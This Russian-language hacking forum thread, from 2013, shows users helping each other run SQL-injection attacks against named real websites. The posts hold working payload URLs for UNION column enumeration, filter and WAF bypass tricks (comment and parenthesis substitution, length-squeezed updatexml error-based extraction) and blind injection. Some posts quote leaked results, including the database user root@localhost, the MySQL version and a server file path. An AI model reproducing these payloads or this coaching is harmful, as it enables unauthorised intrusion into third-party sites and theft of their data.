14.09.2013, 20:51
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
С нами:
8998242
Репутация:
2
|
|
Сообщение от OxoTnik
Да можно, blabla.com/news/
%Inject_Here%
2013
Сообщение от Br@!ns
Можно ли через havij крутить ссылки типа blabla.com/news/2013 ? Или обязателен уязвимый параметр типа =999 ?
|
|
|
16.09.2013, 14:19
|
|
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами:
7504886
Репутация:
0
|
|
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+
|
|
|
|
16.09.2013, 16:09
|
|
Участник форума
Регистрация: 25.12.2011
Сообщений: 103
С нами:
7569686
Репутация:
5
|
|
Сообщение от Always
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+
Too many connections. Положили сканерами.
|
|
|
|
16.09.2013, 16:37
|
|
Новичок
Регистрация: 21.04.2013
Сообщений: 22
С нами:
6874166
Репутация:
0
|
|
Запрос обрабатывается следующим скриптом:
?name=root'\**\or\**\1='1
По идее \**\ должно работать как пробел или нет? Скуль не проходит. Как можно обойти? |
|
|
|
16.09.2013, 18:31
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от Always
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+
Сайт на базе CMS Drupal
Ищите готовые эксплоиты.
|
|
|
|
16.09.2013, 18:35
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от kilo_star
Запрос обрабатывается следующим скриптом:
?name=root'\**\or\**\1='1
По идее \**\ должно работать как пробел или нет? Скуль не проходит. Как можно обойти? root'or(1)='1
|
|
|
|
16.09.2013, 19:23
|
|
Новичок
Регистрация: 21.04.2013
Сообщений: 22
С нами:
6874166
Репутация:
0
|
|
Сообщение от BigBear
root'or(1)='1
спасибо Так а с применением /**/ можно как-то обойти?
|
|
|
|
17.09.2013, 06:55
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от kilo_star
спасибо
Так а с применением /**/ можно как-то обойти?
Рассмотрим данное регулярное выражение:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/\s+/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"name"[/COLOR][COLOR="#007700"]])) {
die([/COLOR][COLOR="#DD0000"]"ERROR NO SPACE"[/COLOR][COLOR="#007700"]);
}
[/COLOR][/COLOR]
В строке производится поиск по символьному классу \s, то есть любых пробельных символов - пробел, TAB, etc... Строка, которая их не содержит или строка, длина которой больше pcre.backtrack_limit (в случае с массивом POST) фильтрацию проходит.
Использование /**/ возможно. Зависимости - mg=off поскольку sql-инъекция в кавычках.
|
|
|
|
17.09.2013, 09:49
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от Always
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+
вырезает некоторые конструкции, а так-же полностью блокирует запрос по рейтингу вхождения в него опасных конструкций.
Очень жестокие фильтры, очень много критериев, в том числе проверяется длина(49 символов):
Код:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,lpad(user(),22,0x3A),1)%23
General error: 1105 XPATH syntax error: ' ::::::::root@localhost'
Все сжимал буквально по одному символу, на один символ больше - уже блок, зато юзер - root При WAF - очень редкое явление.
UDP1:
Код:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,concat(0x3A,user()),1)%23
В этом варианте concat так-же работает, если будет блок - воспользуйтесь вариантом выше.
UDP2:
Еще варианты сжатия:
Код:
При спец. символах в выводе:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,user(),1)%23
Без них(Работает не всегда):
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,concat(':',user()),1)%23
UDP4:
Забыл про саму строку:
Код:
http://www.grafomanam.net/author/%27*updatexml(0,concat(':',version()),1)%23
5.5.33-log
Путь очень длинный:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]usr[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]local[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]apache22[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]grafomanam[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]sites[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php
[/COLOR][/COLOR]
Если только блайндом таблицы выводить с брутом полей - на простой вывод идет очень много символов. MySQL на UNIX-сокете висит, так что удаленно не подключится. Или как вариант - обойти ЧПУ, если фильтр на длину в нем.
|
|
|
|
18.09.2013, 16:37
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от o3
что с этой скулей не так?
__http://www.fuelthebrain.com/mini-books/print.php?bookID=1329876958' order by 11%23
.
(в Вашем случае фильтруются union и select)
Крутите,как слепую:
Сообщение от None
http://www.fuelthebrain.com/mini-books/print.php?bookID=1329876958
'+and+substr(version(),1,1)=5 and '1'='1
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
